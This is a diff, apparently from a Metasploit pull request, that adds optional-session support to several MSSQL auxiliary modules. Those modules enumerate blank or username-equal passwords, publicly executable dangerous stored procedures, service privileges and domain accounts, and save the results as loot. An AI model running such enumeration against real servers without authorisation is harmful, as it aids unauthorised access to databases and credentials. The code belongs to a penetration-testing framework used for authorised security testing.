||||
else
|
||||
print_status("\tNo Windows Groups where found with permission to login to system.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Windows Groups where found with permission to login to system")
|
||||
|
||||
@@ -460,17 +464,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if sameasuser != nil
|
||||
sameasuser.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Username: #{up.join} Password: #{up.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Account with its password being the same as its username was found.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Account with its password being the same as its username was found")
|
||||
end
|
||||
@@ -488,17 +492,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if blankpass != nil
|
||||
blankpass.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Username: #{up.join} Password: EMPTY ")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Accounts with empty passwords where found.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Accounts with empty passwords where found")
|
||||
end
|
||||
@@ -713,18 +717,18 @@ EOS
|
||||
fountsp.each do |strp|
|
||||
if dangeroussp.include?(strp.strip)
|
||||
print_status("\t#{strp.strip}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Stored Procedures with Public Execute Permission #{strp.strip}")
|
||||
end
|
||||
end
|
||||
else
|
||||
print_status("\tNo Dangerous Stored Procedure found with Public Execute.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Dangerous Stored Procedure found with Public Execute")
|
||||
end
|
||||
@@ -756,9 +760,9 @@ EOS
|
||||
instances.each do |i|
|
||||
print_status("\t#{i}")
|
||||
instancenames << i.strip
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Instance Name: #{i}")
|
||||
end
|
||||
@@ -773,9 +777,9 @@ EOS
|
||||
if privdflt != nil
|
||||
privdflt.each do |priv|
|
||||
print_status("\t#{priv[1]}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Default Instance SQL Server running as: #{priv[1]}")
|
||||
end
|
||||
@@ -792,9 +796,9 @@ EOS
|
||||
print_status("Instance #{i} SQL Server Service is running under the privilege of:")
|
||||
privinst.each do |p|
|
||||
print_status("\t#{p[1]}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "#{i} Instance SQL Server running as: #{p[1]}")
|
||||
end
|
||||
|
||||
@@ -106,16 +106,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
# Create output file
|
||||
this_service = report_service(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:host => mssql_client.address,
|
||||
:port => mssql_client.port,
|
||||
:name => 'mssql',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
file_name = "#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv"
|
||||
file_name = "#{mssql_client.address}-#{mssql_client.port}_windows_domain_accounts.csv"
|
||||
path = store_loot(
|
||||
'mssql.domain.accounts',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
mssql_client.address,
|
||||
windows_domain_login_table.to_csv,
|
||||
file_name,
|
||||
'Domain Users enumerated through SQL Server',
|
||||
|
||||
@@ -5,6 +5,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -23,13 +24,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
# Check connection and issue initial query
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_error('Login was unsuccessful. Check your credentials.')
|
||||
disconnect
|
||||
return
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
else
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Query for sysadmin status
|
||||
|
||||
@@ -6,6 +6,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -22,14 +23,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
# Check connection and issue initial query
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_error('Login was unsuccessful. Check your credentials.')
|
||||
disconnect
|
||||
return
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
else
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Query for sysadmin status
|
||||
|
||||
@@ -5,6 +5,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
@@ -26,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
[
|
||||
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
|
||||
[ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
|
||||
]
|
||||
],
|
||||
)
|
||||
)
|
||||
|
||||
@@ -37,7 +38,11 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
return unless mssql_login_datastore
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
return unless mssql_login_datastore
|
||||
end
|
||||
|
||||
technique = datastore['TECHNIQUE']
|
||||
case technique
|
||||
|
||||
@@ -4,9 +4,10 @@
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -337,16 +338,22 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
||||
# STATUSING
|
||||
print_line(" ")
|
||||
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
|
||||
|
||||
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
|
||||
begin
|
||||
result = mssql_query(sql, false) if mssql_login_datastore
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_line(" ")
|
||||
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
|
||||
return unless mssql_login_datastore
|
||||
print_good("Successfully connected to #{mssql_client.address}:#{mssql_client.port}")
|
||||
end
|
||||
result = mssql_query(sql, false)
|
||||
|
||||
column_data = result[:rows]
|
||||
print_good("Successfully connected to #{rhost}:#{rport}")
|
||||
rescue
|
||||
print_error("Failed to connect to #{rhost}:#{rport}.")
|
||||
print_error("Failed to connect to #{rhost}:#{rport}")
|
||||
return
|
||||
end
|
||||
|
||||
@@ -436,8 +443,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
this_service = nil
|
||||
if framework.db and framework.db.active
|
||||
this_service = report_service(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:host => mssql_client.address,
|
||||
:port => mssql_client.port,
|
||||
:name => 'mssql',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
@@ -445,8 +452,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
# CONVERT TABLE TO CSV AND WRITE TO FILE
|
||||
if (save_loot=="yes")
|
||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
|
||||
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)
|
||||
filename= "#{mssql_client.address}-#{mssql_client.port}_sqlserver_query_results.csv"
|
||||
path = store_loot("mssql.data", "text/plain", mssql_client.address, sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)
|
||||
print_good("Query results have been saved to: #{path}")
|
||||
end
|
||||
|
||||
|
||||
@@ -14,6 +14,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -86,12 +87,15 @@ class MetasploitModule < Msf::Auxiliary
|
||||
sql += "DEALLOCATE table_cursor "
|
||||
|
||||
begin
|
||||
if mssql_login_datastore
|
||||
result = mssql_query(sql, false)
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_error('Login failed')
|
||||
return
|
||||
unless mssql_login_datastore
|
||||
print_error('Login failed')
|
||||
return
|
||||
end
|
||||
end
|
||||
result = mssql_query(sql, false)
|
||||
rescue Rex::ConnectionRefused => e
|
||||
print_error("Connection failed: #{e}")
|
||||
return
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user